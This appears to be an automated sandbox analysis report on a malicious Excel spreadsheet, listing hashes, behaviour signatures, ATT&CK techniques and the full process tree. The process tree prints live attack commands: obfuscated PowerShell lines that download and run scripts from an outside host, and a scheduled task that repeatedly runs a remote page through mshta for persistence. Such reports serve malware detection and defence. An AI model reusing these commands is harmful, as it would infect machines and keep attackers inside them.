78f4a26a6d9e52be09cda8edeef93c3f2886ef7cdda107e49c88dbf5bfe3c962

General

Target

SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls
Size

33KB
MD5

7f57f9f35e9465cfc8fbac31913db94e
SHA1

d35cb428f2f57ce38f7c6e71e128bce88fc5fd58
SHA256

78f4a26a6d9e52be09cda8edeef93c3f2886ef7cdda107e49c88dbf5bfe3c962
SHA512

3f2e965a49bac3cc2a29fb37cd91976e379b74f697d933fe6b8f648e2c031c465fb63c6eedc94832dc404389577ff86e8d8f8b48938df03757100657fd182999

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4944	2096	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2040	2096	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1060	2096	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3500	2096	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

16 2348 powershell.exe
33 3212 powershell.exe

flow	pid	process
16	2348	powershell.exe
33	3212	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2576 schtasks.exe

pid	process
2576	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4868 taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1760 PING.EXE
1572 PING.EXE
2116 PING.EXE
1780 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2096 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2348 powershell.exe
2348 powershell.exe
3212 powershell.exe
3212 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

taskkill.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4868 taskkill.exe
Token: SeDebugPrivilege 2348 powershell.exe
Token: SeDebugPrivilege 3212 powershell.exe

pid	process
4868	taskkill.exe

pid	process
1760	PING.EXE
1572	PING.EXE
2116	PING.EXE
1780	PING.EXE

pid	process
2348	powershell.exe
2348	powershell.exe
3212	powershell.exe
3212	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE
2096	EXCEL.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2096 wrote to memory of 4944	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 4944	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 2040	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 2040	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 3500	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 3500	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 1060	2096	EXCEL.EXE	cmd.exe
PID 2096 wrote to memory of 1060	2096	EXCEL.EXE	cmd.exe
PID 2040 wrote to memory of 1760	2040	cmd.exe	PING.EXE
PID 2040 wrote to memory of 1760	2040	cmd.exe	PING.EXE
PID 1060 wrote to memory of 1572	1060	cmd.exe	PING.EXE
PID 1060 wrote to memory of 1572	1060	cmd.exe	PING.EXE
PID 4944 wrote to memory of 1780	4944	cmd.exe	PING.EXE
PID 4944 wrote to memory of 1780	4944	cmd.exe	PING.EXE
PID 3500 wrote to memory of 2116	3500	cmd.exe	PING.EXE
PID 3500 wrote to memory of 2116	3500	cmd.exe	PING.EXE
PID 3500 wrote to memory of 5040	3500	cmd.exe	cmd.exe
PID 3500 wrote to memory of 5040	3500	cmd.exe	cmd.exe
PID 5040 wrote to memory of 2348	5040	cmd.exe	powershell.exe
PID 5040 wrote to memory of 2348	5040	cmd.exe	powershell.exe
PID 3500 wrote to memory of 4048	3500	cmd.exe	cmd.exe
PID 3500 wrote to memory of 4048	3500	cmd.exe	cmd.exe
PID 4048 wrote to memory of 4868	4048	cmd.exe	taskkill.exe
PID 4048 wrote to memory of 4868	4048	cmd.exe	taskkill.exe
PID 4944 wrote to memory of 2204	4944	cmd.exe	cmd.exe
PID 4944 wrote to memory of 2204	4944	cmd.exe	cmd.exe
PID 2204 wrote to memory of 3212	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 3212	2204	cmd.exe	powershell.exe
PID 2040 wrote to memory of 2176	2040	cmd.exe	cmd.exe
PID 2040 wrote to memory of 2176	2040	cmd.exe	cmd.exe
PID 2176 wrote to memory of 2576	2176	cmd.exe	schtasks.exe
PID 2176 wrote to memory of 2576	2176	cmd.exe	schtasks.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.23052.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\system32\PING.EXE
ping -n 80 127.0.0.1
3⤵
- Runs ping.exe
PID:1780

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\system32\PING.EXE
ping -n 85 127.0.0.1
3⤵
- Runs ping.exe
PID:1760

C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
3⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\system32\schtasks.exe
schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
4⤵
- Creates scheduled task(s)
PID:2576

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\PING.EXE
ping -n 7 127.0.0.1
3⤵
- Runs ping.exe
PID:1572

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\system32\PING.EXE
ping -n 10 127.0.0.1
3⤵
- Runs ping.exe
PID:2116

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\system32\cmd.exe
cmd /c start /min taskkill /f /im WINWORD.EXE
3⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\system32\taskkill.exe
taskkill /f /im WINWORD.EXE
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4868

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2a0bc0fac096c06f079b79e8b4da255b

SHA1
7126e9868bff4fa7cac79503879934671af74ac3

SHA256
c97149dab3072de77ceb9fb69a793cb95ace7162fc49982c9d406a285ed19787

SHA512
a7f6548d8e85c48bbb5a5066c28af2fd899d078aad733f0544ed9f5dcc624f745c05fc41a8060acb318709260549938a074e2613b9fdc15f203d995ac532ff4d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
3159606cc69435c1ac83f707fee10f4a

SHA1
486497233fbf6f8de6f873e2f85cd5f0a9d8a94a

SHA256
958553a81c73b987a925a905287457da70cea1d9b7ab7e89716596333ae41448

SHA512
2ae28aeada9723c8912500b2ab0ed63e0a65658a428cb4e6ed02d5021b9c112e0a16be21e7fb18354b6aad0f66fe805b7f82847c66d856445115dd356c16375f

Download Submit
C:\Users\Public\DefenderFile.bat
Filesize
1KB

MD5
ae4a0997ce01f4ebbb3f3cc0054ce933

SHA1
e5bfe3b390f1208b8b6ea0317f4364005f552851

SHA256
a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

SHA512
5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

Download Submit
C:\Users\Public\Outlook.bat
Filesize
900B

MD5
0427a3545c2eaed3167cffe2cf5f8aba

SHA1
b27f3a7d2b855f1d0b84727603add711bb6f6170

SHA256
ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

SHA512
fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

Download Submit
C:\Users\Public\task.bat
Filesize
954B

MD5
20a395a26f50352dc994664c3e7df533

SHA1
9b6407d22297b7af7c49aacd51bf42e51ced7029

SHA256
c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

SHA512
2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

Download Submit
memory/1060-142-0x0000000000000000-mapping.dmp

Download
memory/1572-144-0x0000000000000000-mapping.dmp

Download
memory/1760-143-0x0000000000000000-mapping.dmp

Download
memory/1780-146-0x0000000000000000-mapping.dmp

Download
memory/2040-140-0x0000000000000000-mapping.dmp

Download
memory/2096-134-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-154-0x000002B8FBCF5000-0x000002B8FBCF7000-memory.dmp

Filesize
8KB

Download
memory/2096-145-0x000002B8FBCF5000-0x000002B8FBCF7000-memory.dmp

Filesize
8KB

Download
memory/2096-133-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-173-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-138-0x00007FF8174D0000-0x00007FF8174E0000-memory.dmp

Filesize
64KB

Download
memory/2096-172-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-135-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-171-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-170-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-136-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-132-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

Filesize
64KB

Download
memory/2096-137-0x00007FF8174D0000-0x00007FF8174E0000-memory.dmp

Filesize
64KB

Download
memory/2116-147-0x0000000000000000-mapping.dmp

Download
memory/2176-167-0x0000000000000000-mapping.dmp

Download
memory/2204-159-0x0000000000000000-mapping.dmp

Download
memory/2348-156-0x00007FF830A50000-0x00007FF831511000-memory.dmp

Filesize
10.8MB

Download
memory/2348-157-0x00007FF830A50000-0x00007FF831511000-memory.dmp

Filesize
10.8MB

Download
memory/2348-155-0x00007FF830A50000-0x00007FF831511000-memory.dmp

Filesize
10.8MB

Download
memory/2348-153-0x0000015DEA190000-0x0000015DEA1B2000-memory.dmp

Filesize
136KB

Download
memory/2348-150-0x0000000000000000-mapping.dmp

Download
memory/2576-168-0x0000000000000000-mapping.dmp

Download
memory/3212-165-0x00007FF830A50000-0x00007FF831511000-memory.dmp

Filesize
10.8MB

Download
memory/3212-164-0x00007FF830A50000-0x00007FF831511000-memory.dmp

Filesize
10.8MB

Download
memory/3212-160-0x0000000000000000-mapping.dmp

Download
memory/3500-141-0x0000000000000000-mapping.dmp

Download
memory/4048-151-0x0000000000000000-mapping.dmp

Download
memory/4868-152-0x0000000000000000-mapping.dmp

Download
memory/4944-139-0x0000000000000000-mapping.dmp

Download
memory/5040-149-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads